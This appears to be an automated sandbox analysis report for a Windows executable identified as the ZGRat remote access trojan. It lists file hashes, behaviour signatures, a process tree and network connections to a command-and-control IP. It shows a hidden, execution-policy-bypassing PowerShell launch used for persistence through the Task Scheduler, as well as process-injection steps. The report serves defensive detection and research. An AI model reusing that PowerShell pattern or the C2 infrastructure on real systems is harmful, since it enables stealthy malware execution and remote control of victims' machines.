Analysis

  • max time kernel
    130s
  • max time network
    140s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
  • submitted
    08-05-2024 14:17

General

  • Target

    SecuriteInfo.com.Trojan.PackedNET.2147.22278.5618.exe

  • Size

    632KB

  • MD5

    9ffcbf13ec0d927ab745589c64dba569

  • SHA1

    74e9aa1a9225f2acc5ee4aa86993970d3d6df5a8

  • SHA256

    dfba4d1c63cb8b9e426b04fa2b048bfe4554de13e7ce1c2c5e665cc708a23d09

  • SHA512

    cb695ca80b70b6b09af9a43d13363aab86186ca0c44d1f324dfb4bb2d978873cde900efc87b4db0ff2b9d0a321b626a1de97c31a995f5c4e437b16ad3f96ae25

  • SSDEEP

    12288:9ziGDwpg7nTwyrc30trN3OERv1Qdee1teN4FhunLNhcZU+sNmtwZ:9jrTNrc3aOgv1OeCeSh0NhQU1NmiZ

Score
10/10

Malware Config

Signatures

  • Detect ZGRat V1 1 IoCs
  • ZGRat

    ZGRat is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell with the display window hidden.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.PackedNET.2147.22278.5618.exe
    "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.PackedNET.2147.22278.5618.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1720
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {7BB82FBB-0E47-401E-87F1-F5A180EA7082} S-1-5-21-3627615824-4061627003-3019543961-1000:SCFGBRBT\Admin:S4U:
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2900
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc 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
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2588
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {25B859C0-6D7D-4A12-886D-050EB29E8B45} S-1-5-21-3627615824-4061627003-3019543961-1000:SCFGBRBT\Admin:Interactive:[1]
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2564
    • C:\Users\Admin\AppData\Roaming\DelaySign\TypeId.exe
      C:\Users\Admin\AppData\Roaming\DelaySign\TypeId.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3000
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3016

Network

  • 91.92.253.28:39001
    RegAsm.exe
    152 B
    3
  • 91.92.253.28:39002
    RegAsm.exe
    152 B
    3
  • 91.92.253.28:39003
    RegAsm.exe
    152 B
    3
  • 91.92.253.28:39001
    RegAsm.exe
    152 B
    3
  • 91.92.253.28:39002
    RegAsm.exe
    152 B
    3

MITRE ATT&CK Enterprise v15

Downloads

  • \Users\Admin\AppData\Roaming\DelaySign\TypeId.exe

    Filesize

    632KB

    MD5

    9ffcbf13ec0d927ab745589c64dba569

    SHA1

    74e9aa1a9225f2acc5ee4aa86993970d3d6df5a8

    SHA256

    dfba4d1c63cb8b9e426b04fa2b048bfe4554de13e7ce1c2c5e665cc708a23d09

    SHA512

    cb695ca80b70b6b09af9a43d13363aab86186ca0c44d1f324dfb4bb2d978873cde900efc87b4db0ff2b9d0a321b626a1de97c31a995f5c4e437b16ad3f96ae25

  • memory/1720-16-0x000007FEF5C90000-0x000007FEF667C000-memory.dmp

    Filesize

    9.9MB

  • memory/1720-1-0x000000013FC00000-0x000000013FCA2000-memory.dmp

    Filesize

    648KB

  • memory/1720-2-0x000000001B700000-0x000000001B804000-memory.dmp

    Filesize

    1.0MB

  • memory/1720-3-0x000007FEF5C90000-0x000007FEF667C000-memory.dmp

    Filesize

    9.9MB

  • memory/1720-4-0x0000000000710000-0x0000000000766000-memory.dmp

    Filesize

    344KB

  • memory/1720-5-0x0000000002090000-0x00000000020DC000-memory.dmp

    Filesize

    304KB

  • memory/1720-6-0x000000001C0E0000-0x000000001C134000-memory.dmp

    Filesize

    336KB

  • memory/1720-0-0x000007FEF5C93000-0x000007FEF5C94000-memory.dmp

    Filesize

    4KB

  • memory/2588-12-0x000000001A290000-0x000000001A572000-memory.dmp

    Filesize

    2.9MB

  • memory/2588-13-0x00000000012F0000-0x00000000012F8000-memory.dmp

    Filesize

    32KB

  • memory/2588-11-0x0000000001990000-0x0000000001A10000-memory.dmp

    Filesize

    512KB

  • memory/3000-21-0x0000000002540000-0x0000000002594000-memory.dmp

    Filesize

    336KB

  • memory/3016-26-0x0000000140000000-0x00000001400A2000-memory.dmp

    Filesize

    648KB

  • memory/3016-24-0x0000000140000000-0x00000001400A2000-memory.dmp

    Filesize

    648KB

  • memory/3016-23-0x0000000140000000-0x00000001400A2000-memory.dmp

    Filesize

    648KB

  • memory/3016-28-0x000007FFFFFDB000-0x000007FFFFFDC000-memory.dmp

    Filesize

    4KB

  • memory/3016-29-0x0000000140000000-0x00000001400A2000-memory.dmp

    Filesize

    648KB
